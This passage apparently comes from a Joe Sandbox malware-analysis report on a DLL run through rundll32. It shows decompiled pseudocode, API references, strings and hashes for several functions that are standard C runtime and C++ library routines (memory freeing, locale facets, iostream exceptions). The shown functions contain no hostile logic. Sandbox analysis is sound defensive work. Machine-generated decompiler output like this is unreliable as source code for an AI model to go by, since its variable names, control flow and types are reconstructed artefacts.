				goto L4;
			}

0x1000dfad
0x1000dfb5
0x1000dfbb
0x1000dfc1
0x1000dfc5
0x1000dfdf
0x1000dfdf
0x1000dfe1
0x1000dfe6
0x1000dfee
0x1000dff7
0x1000e010
0x1000e011
0x1000e01c
0x1000e022
0x1000e02d
0x1000e032
0x1000e035
0x1000e03e
0x1000e046
0x1000e048
0x1000e04e
0x1000e051
0x1000e056
0x1000e04e
0x1000e058
0x1000e05e
0x1000e063
0x1000e06a
0x1000e06d
0x1000e073
0x1000e073
0x1000e079
0x1000e080
0x1000e083
0x1000e089
0x1000e089
0x1000e08f
0x1000e094
0x1000e09a
0x1000e0b9
0x1000e0b9
0x1000e09c
0x1000e09c
0x1000e0a8
0x00000000
0x00000000
0x1000e0ab
0x1000e0b1
0x00000000
0x1000e0b1
0x1000e09a
0x1000dff9
0x1000dfff
0x1000e005
0x1000e008
0x00000000
0x00000000
0x00000000
0x1000e008
0x1000e00a
0x00000000
0x1000e00a
0x1000dfc7
0x1000dfce
0x1000dfd4
0x1000dfd7
0x00000000
0x00000000
0x00000000
0x1000dfd7
0x1000dfd9
0x00000000

APIs

DecodePointer.KERNEL32(?,00000001,10008DBE,10024880,00000008,10008EF5,?,00000001,?,100248A0,0000000C,10008E94,?,00000001,?), ref: 1000DFB5
_free.LIBCMT ref: 1000DFCE

Part of subcall function 10008AD3: HeapFree.KERNEL32(00000000,00000000), ref: 10008AE7
Part of subcall function 10008AD3: GetLastError.KERNEL32(00000000,?,1000F3A8,00000000,00000001,00000000,10003239,?,?,10008BF2,10005EC2,?), ref: 10008AF9

_free.LIBCMT ref: 1000DFE1
_free.LIBCMT ref: 1000DFFF
_free.LIBCMT ref: 1000E011
_free.LIBCMT ref: 1000E022
_free.LIBCMT ref: 1000E02D
_free.LIBCMT ref: 1000E051
EncodePointer.KERNEL32(00000000), ref: 1000E058
_free.LIBCMT ref: 1000E06D
_free.LIBCMT ref: 1000E083
_free.LIBCMT ref: 1000E0AB

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 6be48f253c668859de04efb31c7fcc48d17f8a7040514be4d7a8f057139d8960
Instruction ID: cd14976372ca5688ad9b654bce5c9d6739722621459927dd3d3cd2fb709a75b1
Opcode Fuzzy Hash: 6be48f253c668859de04efb31c7fcc48d17f8a7040514be4d7a8f057139d8960
Instruction Fuzzy Hash: EE219336A052718BFF11DF14DCC055A77A5FB093E0322046BF849A7A68D7759D828BA2

Uniqueness

Uniqueness Score: -1.00%

Function 100065E8, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E100065E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t17;
				void* _t22;
				intOrPtr* _t40;
				void* _t43;

				_push(0x14);
				E1000907E(E1001BEDE, __ebx, __edi, __esi);
				E10005F88(_t43 - 0x14, 0);
				_t40 =  *0x10027c20; // 0x0
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				 *((intOrPtr*)(_t43 - 0x10)) = _t40;
				_t17 = E10002520( *((intOrPtr*)(_t43 + 8)), E100022E0(0x10027c18));
				_t42 = _t17;
				if(_t17 == 0) {
					if(_t40 == 0) {
						_push( *((intOrPtr*)(_t43 + 8)));
						_push(_t43 - 0x10);
						_t22 = E100069E1(__ebx, _t40, _t42, __eflags);
						__eflags = _t22 - 0xffffffff;
						if(_t22 == 0xffffffff) {
							E10008BB8(_t43 - 0x20, "bad cast");
							E10007F53(_t43 - 0x20, 0x10024628);
						}
						_t42 =  *((intOrPtr*)(_t43 - 0x10));
						 *0x10027c20 = _t42;
						 *((intOrPtr*)( *_t42 + 4))();
						E1000638A(_t42);
					} else {
						_t42 = _t40;
					}
				}
				E10005FE3(_t43 - 0x14);
				return E1000905B(_t42);
			}

0x100065e8
0x100065ef
0x100065f9
0x100065fe
0x10006609
0x1000660d
0x10006619
0x1000661e
0x10006622
0x10006626
0x1000662c
0x10006632
0x10006633
0x1000663a
0x1000663d
0x10006647
0x10006655
0x10006655
0x1000665a
0x1000665f
0x10006667
0x1000666b
0x10006628
0x10006628
0x10006628
0x10006626
0x10006674
0x10006680

APIs

__EH_prolog3.LIBCMT ref: 100065EF
std::_Lockit::_Lockit.LIBCPMT ref: 100065F9

Part of subcall function 10005F88: __lock.LIBCMT ref: 10005F99

int.LIBCPMT ref: 10006610

Part of subcall function 100022E0: std::_Lockit::_Lockit.LIBCPMT ref: 100022F1

codecvt.LIBCPMT ref: 10006633
std::bad_exception::bad_exception.LIBCMT ref: 10006647
__CxxThrowException@8.LIBCMT ref: 10006655
std::_Facet_Register.LIBCPMT ref: 1000666B

Strings

bad cast, xrefs: 1000663F

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1512642153-3145022300
Opcode ID: 9168d3de841696d52b4bdc4945e47fb6afd55c9302335e7afc702e080694a290
Instruction ID: 664ae497bd34e91b310cb502fe2371c366767270b5f31e015369c77bcea30a11
Opcode Fuzzy Hash: 9168d3de841696d52b4bdc4945e47fb6afd55c9302335e7afc702e080694a290
Instruction Fuzzy Hash: 4F016D398045259BEB01DBA0CC529EE73B5FF082E1F61051AF5156B299DF79AA018B90

Uniqueness

Uniqueness Score: -1.00%

Function 10001900, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 267
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10001900(signed int* _a4, intOrPtr* _a8, signed char _a11) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed char _v21;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v60;
				char _v80;
				char _v100;
				void* __ebx;
				signed int _t105;
				intOrPtr* _t108;
				signed int _t109;
				intOrPtr _t111;
				intOrPtr _t113;
				signed int _t114;
				signed int _t115;
				intOrPtr _t124;
				void* _t126;
				signed int _t133;
				signed int _t134;
				intOrPtr _t145;
				signed int _t148;
				signed int _t150;
				signed char _t153;
				intOrPtr _t155;
				signed int _t158;
				signed int _t159;
				signed char _t162;
				intOrPtr _t163;
				signed int _t168;
				void* _t170;
				signed int* _t171;
				intOrPtr* _t173;
				signed char _t178;
				intOrPtr* _t181;
				intOrPtr* _t182;
				signed char** _t183;
				signed int* _t184;
				signed int* _t185;
				intOrPtr* _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed int _t192;
				void* _t194;
				signed char _t196;
				signed char _t200;
				signed int* _t201;
				intOrPtr _t203;
				signed int _t204;
				signed int _t207;
				signed int _t208;
				signed int _t210;
				void* _t211;
				signed int _t214;
				signed int _t216;

				_push(0xffffffff);
				_push(E1001BC40);
				_push( *[fs:0x0]);
				_t105 =  *0x10026250; // 0x93b758c1
				_push(_t105 ^ _t210);
				 *[fs:0x0] =  &_v16;
				_v20 = _t211 - 0x54;
				_t108 = _a8;
				_t207 = 0;
				_v32 = 0;
				if( *_t108 != 0) {
					_t188 = _t108;
					_t5 = _t188 + 1; // 0x1
					_t170 = _t5;
					do {
						_t109 =  *_t188;
						_t188 = _t188 + 1;
						__eflags = _t109;
					} while (_t109 != 0);
					_t189 = _t188 - _t170;
					__eflags = _t189;
					L5:
					_t171 = _a4;
					_v28 = _t189;
					_t111 =  *((intOrPtr*)( *_t171 + 4));
					_t168 =  *(_t111 +  &(_t171[9]));
					_t203 =  *((intOrPtr*)(_t111 +  &(_t171[8])));
					_t214 = _t168;
					if(_t214 < 0) {
						L12:
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x24], xmm0");
						_t168 = _v36;
						_t204 = _v40;
						L13:
						_t190 =  *((intOrPtr*)(_t111 +  &(_t171[0xe])));
						_v40 = _t171;
						if(_t190 != 0) {
							 *((intOrPtr*)( *_t190 + 4))();
							_t171 = _a4;
						}
						_v8 = 0;
						_t113 =  *((intOrPtr*)( *_t171 + 4));
						if( *((intOrPtr*)(_t113 +  &(_t171[3]))) == 0) {
							_t163 =  *((intOrPtr*)(_t113 +  &(_t171[0xf])));
							if(_t163 != 0 && _t163 != _t171) {
								E10002B20(_t168, _t163);
								_t171 = _a4;
							}
						}
						_t114 =  *_t171;
						_t192 =  *((intOrPtr*)(_t114 + 4)) + _t171;
						_t115 = _t114 & 0xffffff00 |  *((intOrPtr*)(_t192 + 0xc)) == 0x00000000;
						_v36 = _t115;
						_v8 = 1;
						if(_t115 != 0) {
							_v8 = 2;
							__eflags = ( *(_t192 + 0x14) & 0x000001c0) - 0x40;
							if(( *(_t192 + 0x14) & 0x000001c0) == 0x40) {
								L34:
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t171 + 4)) +  &(_t171[0xe]))))) + 0x24))))(_a8, _v28, 0) - _v28;
								if(__eflags != 0) {
									L47:
									_t207 = 4;
									L48:
									_t171 = _a4;
									L49:
									_t124 =  *((intOrPtr*)( *_t171 + 4));
									 *((intOrPtr*)(_t124 +  &(_t171[8]))) = 0;
									 *((intOrPtr*)(_t124 +  &(_t171[9]))) = 0;
									_v8 = 1;
									goto L51;
								}
								__eflags = _t192;
								if(__eflags != 0) {
									goto L47;
								} else {
									goto L36;
								}
								while(1) {
									L36:
									__eflags = _t168;
									if(__eflags < 0) {
										goto L48;
									}
									if(__eflags > 0) {
										L39:
										_t181 = _a4;
										_t145 =  *((intOrPtr*)( *_t181 + 4));
										_t196 =  *((intOrPtr*)(_t145 + _t181 + 0x40));
										_t182 =  *((intOrPtr*)(_t145 + _t181 + 0x38));
										_a11 = _t196;
										__eflags =  *( *(_t182 + 0x20));
										if( *( *(_t182 + 0x20)) == 0) {
											L43:
											_t148 =  *((intOrPtr*)( *_t182 + 0xc))(_t196 & 0x000000ff);
											L44:
											__eflags = _t148 - 0xffffffff;
											if(__eflags != 0) {
												_t204 = _t204 + 0xffffffff;
												asm("adc ebx, 0xffffffff");
												continue;
											}
											_t207 = _t207 | 0x00000004;
											goto L48;
										}
										_t150 =  *( *(_t182 + 0x30));
										__eflags = _t150;
										if(_t150 <= 0) {
											goto L43;
										}
										 *( *(_t182 + 0x30)) = _t150 - 1;
										_t183 =  *(_t182 + 0x20);
										_t68 =  &(( *_t183)[1]); // 0x1
										 *_t183 = _t68;
										_t153 = _a11;
										 *( *_t183) = _t153;
										_t148 = _t153 & 0x000000ff;
										goto L44;
									}
									__eflags = _t204;
									if(__eflags == 0) {
										goto L48;
									}
									goto L39;
								}
								goto L48;
							}
							while(1) {
								__eflags = _t168;
								if(__eflags < 0) {
									break;
								}
								if(__eflags > 0) {
									L26:
									_t155 =  *((intOrPtr*)( *_t171 + 4));
									_t200 =  *((intOrPtr*)(_t155 +  &(_t171[0x10])));
									_t184 =  *(_t155 +  &(_t171[0xe]));
									_v21 = _t200;
									__eflags =  *(_t184[8]);
									if( *(_t184[8]) == 0) {
										L30:
										_t192 =  *_t184;
										_t158 =  *((intOrPtr*)(_t192 + 0xc))(_t200 & 0x000000ff);
										L31:
										_t171 = _a4;
										__eflags = _t158 - 0xffffffff;
										if(_t158 != 0xffffffff) {
											_t204 = _t204 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										}
										_t207 = _t207 | 0x00000004;
										__eflags = _t207;
										_v32 = _t207;
										break;
									}
									_t201 = _t184[0xc];
									_t159 =  *_t201;
									__eflags = _t159;
									if(_t159 <= 0) {
										_t200 = _v21;
										goto L30;
									}
									 *_t201 = _t159 - 1;
									_t185 = _t184[8];
									_t192 =  *_t185;
									_t44 = _t192 + 1; // 0x1
									 *_t185 = _t44;
									_t162 = _v21;
									 *_t192 = _t162;
									_t158 = _t162 & 0x000000ff;
									goto L31;
								}
								__eflags = _t204;
								if(_t204 == 0) {
									break;
								}
								goto L26;
							}
							__eflags = _t207;
							if(__eflags != 0) {
								goto L49;
							}
							goto L34;
						} else {
							_t207 = 4;
							L51:
							_t194 =  *((intOrPtr*)( *_t171 + 4)) + _t171;
							if(_t207 != 0) {
								_t133 =  *(_t194 + 0xc) | _t207;
								if( *((intOrPtr*)(_t194 + 0x38)) == 0) {
									_t133 = _t133 | 0x00000004;
								}
								_t134 = _t133 & 0x00000017;
								 *(_t194 + 0xc) = _t134;
								_t178 =  *(_t194 + 0x10) & _t134;
								if(_t178 != 0) {
									if((_t178 & 0x00000004) != 0) {
										_t178 =  &_v60;
										E100020F0(_t168, _t178, 1, 0x10026008, "ios_base::badbit set");
										_v60 = 0x1001d34c;
										E10007F53( &_v60, 0x100245ac);
									}
									_t229 = _t178 & 0x00000002;
									if((_t178 & 0x00000002) != 0) {
										E100020F0(_t168,  &_v80, 1, 0x10026008, "ios_base::failbit set");
										_v80 = 0x1001d34c;
										E10007F53( &_v80, 0x100245ac);
									}
									E100020F0(_t168,  &_v100, 1, 0x10026008, "ios_base::eofbit set");
									_v100 = 0x1001d34c;
									E10007F53( &_v100, 0x100245ac);
								}
							}
							_v8 = 0xffffffff;
							_t126 = L10006007(_t229);
							_t208 = _v40;
							if(_t126 == 0) {
								E10002650(_t208);
							}
							_t173 =  *((intOrPtr*)( *((intOrPtr*)( *_t208 + 4)) + _t208 + 0x38));
							if(_t173 != 0) {
								 *((intOrPtr*)( *_t173 + 8))();
							}
							 *[fs:0x0] = _v16;
							return _a4;
						}
					}
					if(_t214 > 0) {
						L11:
						_t204 = _t203 - _t189;
						asm("sbb ebx, esi");
						goto L13;
					}
					if(_t203 == 0) {
						goto L12;
					}
					_t216 = _t168;
					if(_t216 < 0 || _t216 <= 0 && _t203 <= _t189) {
						goto L12;
					} else {
						goto L11;
					}
				}
				_t189 = 0;
				goto L5;
			}

0x10001903
0x10001905
0x10001910
0x10001917
0x1000191e
0x10001922
0x10001928
0x1000192b
0x1000192e
0x10001930
0x10001936
0x1000193c
0x1000193e
0x1000193e
0x10001941
0x10001941
0x10001943
0x10001944
0x10001944
0x10001948
0x10001948
0x1000194a
0x1000194a
0x1000194d
0x10001952
0x10001955
0x10001959
0x1000195d
0x1000195f
0x10001977
0x10001977
0x1000197a
0x1000197f
0x10001982
0x10001985
0x10001985
0x10001989
0x1000198e
0x10001994
0x10001997
0x10001997
0x1000199c
0x100019a3
0x100019ab
0x100019ad
0x100019b3
0x100019bb
0x100019c0
0x100019c0
0x100019b3
0x100019c3
0x100019c8
0x100019ce
0x100019d1
0x100019d4
0x100019dd
0x100019f1
0x100019f5
0x100019f8
0x10001a64
0x10001a7c
0x10001a7f
0x10001af3
0x10001af3
0x10001af8
0x10001af8
0x10001afb
0x10001afd
0x10001b00
0x10001b08
0x10001b47
0x00000000
0x10001b47
0x10001a81
0x10001a83
0x00000000
0x00000000
0x00000000
0x00000000
0x10001a85
0x10001a85
0x10001a85
0x10001a87
0x00000000
0x00000000
0x10001a89
0x10001a8f
0x10001a8f
0x10001a94
0x10001a97
0x10001a9b
0x10001a9f
0x10001aa5
0x10001aa8
0x10001ad8
0x10001ade
0x10001ae1
0x10001ae1
0x10001ae4
0x10001aeb
0x10001aee
0x00000000
0x10001aee
0x10001ae6
0x00000000
0x10001ae6
0x10001aad
0x10001aaf
0x10001ab1
0x00000000
0x00000000
0x10001ab7
0x10001ab9
0x10001abe
0x10001ac1
0x10001ac3
0x10001ac6
0x10001ac8
0x00000000
0x10001ac8
0x10001a8b
0x10001a8d
0x00000000
0x00000000
0x00000000
0x10001a8d
0x00000000
0x10001a85
0x10001a00
0x10001a00
0x10001a02
0x00000000
0x00000000
0x10001a04
0x10001a0a
0x10001a0c
0x10001a0f
0x10001a13
0x10001a17
0x10001a1d
0x10001a20
0x10001a45
0x10001a48
0x10001a4b
0x10001a4e
0x10001a4e
0x10001a51
0x10001a54
0x10001acd
0x10001ad0
0x00000000
0x10001ad0
0x10001a56
0x10001a56
0x10001a59
0x00000000
0x10001a59
0x10001a22
0x10001a25
0x10001a27
0x10001a29
0x10001a42
0x00000000
0x10001a42
0x10001a2c
0x10001a2e
0x10001a31
0x10001a33
0x10001a36
0x10001a38
0x10001a3b
0x10001a3d
0x00000000
0x10001a3d
0x10001a06
0x10001a08
0x00000000
0x00000000
0x00000000
0x10001a08
0x10001a5c
0x10001a5e
0x00000000
0x00000000
0x00000000
0x100019df
0x100019df
0x10001b4e
0x10001b53
0x10001b57
0x10001b60
0x10001b66
0x10001b68
0x10001b68
0x10001b6e
0x10001b71
0x10001b74
0x10001b76
0x10001b7f
0x10001b8d
0x10001b90
0x10001b9d
0x10001ba5
0x10001ba5
0x10001baa
0x10001bad
0x10001bbe
0x10001bcb
0x10001bd3
0x10001bd3
0x10001be7
0x10001bf4
0x10001bfc
0x10001bfc
0x10001b76
0x10001c01
0x10001c08
0x10001c0d
0x10001c12
0x10001c16
0x10001c16
0x10001c20
0x10001c26
0x10001c2a
0x10001c2a
0x10001c33
0x10001c41
0x10001c41
0x100019dd
0x10001961
0x10001971
0x10001971
0x10001973
0x00000000
0x10001973
0x10001965
0x00000000
0x00000000
0x10001967
0x10001969
0x00000000
0x00000000
0x00000000
0x00000000
0x10001969
0x10001938
0x00000000

APIs

__CxxThrowException@8.LIBCMT ref: 10001BA5
__CxxThrowException@8.LIBCMT ref: 10001BD3
__CxxThrowException@8.LIBCMT ref: 10001BFC

Strings

ios_base::failbit set, xrefs: 10001BAF
ios_base::badbit set, xrefs: 10001B81
ios_base::eofbit set, xrefs: 10001BD8

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 3fa2150dcfb7d55e5c61989b2013b8e051e179f1debd7edfe459c511255995c4
Instruction ID: adc7c2ef8ca1f37af99fd1b839d7c61eec3e71b4ef9c48dbde5d65998847f9b7
Opcode Fuzzy Hash: 3fa2150dcfb7d55e5c61989b2013b8e051e179f1debd7edfe459c511255995c4
Instruction Fuzzy Hash: 2EB16B35A016458FEB00CF64C890BD9BBF1FF4A394F1582A8E8559B39ACB35ED45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 100099DD, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E100099DD(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				void* _t45;
				signed int _t49;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr* _t64;
				intOrPtr _t70;
				signed int* _t73;
				void* _t75;
				void* _t76;

				_t57 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t64 = _a4;
				_t77 =  *_t64 - 0x80000003;
				if( *_t64 == 0x80000003) {
					L19:
					return _t44;
				}
				_t45 = E1000F330(_t64, _t77);
				_t54 = _a20;
				_t78 =  *((intOrPtr*)(_t45 + 0x80));
				if( *((intOrPtr*)(_t45 + 0x80)) == 0) {
					L6:
					if( *((intOrPtr*)(_t54 + 0xc)) == 0) {
						E1000F54C();
					}
					_t44 = E100081C4(_t57, _t54, _a28, _a24,  &_v12,  &_v8);
					_t58 = _v12;
					_t76 = _t75 + 0x14;
					_t61 = _v8;
					if(_t58 >= _t61) {
						L18:
						goto L19;
					} else {
						_t17 = _t44 + 0xc; // 0xc
						_t73 = _t17;
						_t44 = _a24;
						do {
							if(_t44 >=  *((intOrPtr*)(_t73 - 0xc)) && _t44 <=  *((intOrPtr*)(_t73 - 8))) {
								_t49 =  *_t73 << 4;
								if( *((intOrPtr*)(_t73[1] + _t49 - 0xc)) == 0) {
									L14:
									_t50 = _t49 + _t73[1] + 0xfffffff0;
									_t70 = _a4;
									if(( *(_t49 + _t73[1] + 0xfffffff0) & 0x00000040) == 0) {
										_push(1);
										_t35 = _t73 - 0xc; // 0x0
										E10009578(_t54, _t73, _t70, _a8, _a12, _a16, _t54, _t50, 0, _t35, _a28, _a32);
										_t61 = _v8;
										_t76 = _t76 + 0x2c;
										_t58 = _v12;
									}
									L16:
									_t44 = _a24;
									goto L17;
								}
								_t61 = _v8;
								_t54 = _a20;
								if( *((char*)( *((intOrPtr*)(_t73[1] + _t49 - 0xc)) + 8)) != 0) {
									goto L16;
								}
								goto L14;
							}
							L17:
							_t58 = _t58 + 1;
							_t73 =  &(_t73[5]);
							_v12 = _t58;
						} while (_t58 < _t61);
						goto L18;
					}
				}
				__imp__EncodePointer(0);
				if( *((intOrPtr*)(E1000F330(_t64, _t78) + 0x80)) != _t45 &&  *_t64 != 0xe0434f4d &&  *_t64 != 0xe0434352) {
					_t44 = E100080ED(_t64, _a8, _a12, _a16, _t54, _a28, _a32);
					_t75 = _t75 + 0x1c;
					if(_t44 != 0) {
						goto L18;
					}
				}
			}

0x100099dd
0x100099e0
0x100099e1
0x100099e3
0x100099e6
0x100099ec
0x10009af4
0x10009af8
0x10009af8
0x100099f4
0x100099f9
0x100099fc
0x10009a03
0x10009a4d
0x10009a51
0x10009a53
0x10009a53
0x10009a67
0x10009a6c
0x10009a6f
0x10009a72
0x10009a77
0x10009af2
0x00000000
0x10009a79
0x10009a79
0x10009a79
0x10009a7c
0x10009a7f
0x10009a82
0x10009a8e
0x10009a97
0x10009aac
0x10009ab2
0x10009ab4
0x10009aba
0x10009abc
0x10009ac1
0x10009ad6
0x10009adb
0x10009ade
0x10009ae1
0x10009ae1
0x10009ae4
0x10009ae4
0x00000000
0x10009ae4
0x10009aa0
0x10009aa7
0x10009aaa
0x00000000
0x00000000
0x00000000
0x10009aaa
0x10009ae7
0x10009ae7
0x10009ae8
0x10009aeb
0x10009aee
0x00000000
0x10009a7f
0x10009a77
0x10009a07
0x10009a1a
0x10009a3d
0x10009a42
0x10009a47
0x00000000
0x00000000
0x10009a47

APIs

Part of subcall function 1000F330: __getptd_noexit.LIBCMT ref: 1000F331
Part of subcall function 1000F330: __amsg_exit.LIBCMT ref: 1000F33E

EncodePointer.KERNEL32(00000000), ref: 10009A07
_CallSETranslator.LIBCMT ref: 10009A3D
_GetRangeOfTrysToCheck.LIBCMT ref: 10009A67

Strings

RCC, xrefs: 10009A24
7Y, xrefs: 100099F4
MOC, xrefs: 10009A1C

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CallCheckEncodePointerRangeTranslatorTrys__amsg_exit__getptd_noexit
String ID: MOC$RCC$7Y
API String ID: 3119380580-1315045018
Opcode ID: ef98dbfce8de3487abe8c2b787e4b8b53f4173ffaefa84d5d45f8c63a481a8a0
Instruction ID: 7c3c2fc1a858b75879266add23b4905e72d4e8c0459af604e9e56c5614e803bb
Opcode Fuzzy Hash: ef98dbfce8de3487abe8c2b787e4b8b53f4173ffaefa84d5d45f8c63a481a8a0
Instruction Fuzzy Hash: 91416732600149AFEF01CF84C881EAEB7AAFF49394F198198F90557255C375EE61DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10001D90, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10001D90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v40;
				signed int _t26;
				void* _t39;
				signed int _t44;
				signed int _t45;
				char _t47;
				intOrPtr _t51;
				signed int _t61;
				intOrPtr* _t64;
				signed int _t66;
				void* _t72;

				_push(0xffffffff);
				_push(E1001BCA8);
				_push( *[fs:0x0]);
				_t26 =  *0x10026250; // 0x93b758c1
				_push(_t26 ^ _t66);
				 *[fs:0x0] =  &_v16;
				E10005F88( &_v28, 0);
				_t61 =  *0x10027b48; // 0x1
				_t47 =  *0x10027ac0; // 0x8f8e18
				_v8 = 0;
				_v20 = _t47;
				if(_t61 == 0) {
					E10005F88( &_v24, _t61);
					_t72 =  *0x10027b48 - _t61; // 0x1
					if(_t72 == 0) {
						_t44 =  *0x10027b38; // 0x1
						_t45 = _t44 + 1;
						 *0x10027b38 = _t45;
						 *0x10027b48 = _t45;
					}
					E10005FE3( &_v24);
					_t61 =  *0x10027b48; // 0x1
				}
				_t51 =  *_a4;
				if(_t61 >=  *((intOrPtr*)(_t51 + 0xc))) {
					_t64 = 0;
					goto L8;
				} else {
					_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 8)) + _t61 * 4));
					if(_t64 != 0) {
						L17:
						E10005FE3( &_v28);
						 *[fs:0x0] = _v16;
						return _t64;
					}
					L8:
					if( *((char*)(_t51 + 0x14)) == 0) {
						L11:
						if(_t64 != 0) {
							goto L17;
						}
						L12:
						if(_t47 == 0) {
							if(E10002450( &_v20, _a4) == 0xffffffff) {
								E10008BB8( &_v40, "bad cast");
								E10007F53( &_v40, 0x10024628);
							}
							_t64 = _v20;
							 *0x10027ac0 = _t64;
							 *((intOrPtr*)( *_t64 + 4))();
							E1000638A(_t64);
						} else {
							_t64 = _t47;
						}
						goto L17;
					}
					_t39 = E100063B2();
					if(_t61 >=  *((intOrPtr*)(_t39 + 0xc))) {
						goto L12;
					}
					_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 8)) + _t61 * 4));
					goto L11;
				}
			}

0x10001d93
0x10001d95
0x10001da0
0x10001da7
0x10001dae
0x10001db2
0x10001dbd
0x10001dc2
0x10001dc8
0x10001dce
0x10001dd5
0x10001dda
0x10001de0
0x10001de5
0x10001deb
0x10001ded
0x10001df2
0x10001df3
0x10001df8
0x10001df8
0x10001e00
0x10001e05
0x10001e05
0x10001e0e
0x10001e13
0x10001e21
0x00000000
0x10001e15
0x10001e18
0x10001e1d
0x10001e8d
0x10001e90
0x10001e9a
0x10001ea8
0x10001ea8
0x10001e23
0x10001e27
0x10001e39
0x10001e3b
0x00000000
0x00000000
0x10001e3d
0x10001e3f
0x10001e57
0x10001e61
0x10001e6f
0x10001e6f
0x10001e74
0x10001e79
0x10001e81
0x10001e85
0x10001e41
0x10001e41
0x10001e41
0x00000000
0x10001e3f
0x10001e29
0x10001e31
0x00000000
0x00000000
0x10001e36
0x00000000
0x10001e36

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 10001DBD

Part of subcall function 10005F88: __lock.LIBCMT ref: 10005F99

std::_Lockit::_Lockit.LIBCPMT ref: 10001DE0
std::bad_exception::bad_exception.LIBCMT ref: 10001E61
__CxxThrowException@8.LIBCMT ref: 10001E6F
std::_Facet_Register.LIBCPMT ref: 10001E85

Strings

bad cast, xrefs: 10001E59

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 153433846-3145022300
Opcode ID: fbfdc77a58bec1e573856a9fe5d9f29e5f9f55b48c888cdd56afefdb0c6cbbce
Instruction ID: 39932938521e9c3c3688147745477b0cc6f50b93e4573fb04339e6292b93faf1
Opcode Fuzzy Hash: fbfdc77a58bec1e573856a9fe5d9f29e5f9f55b48c888cdd56afefdb0c6cbbce
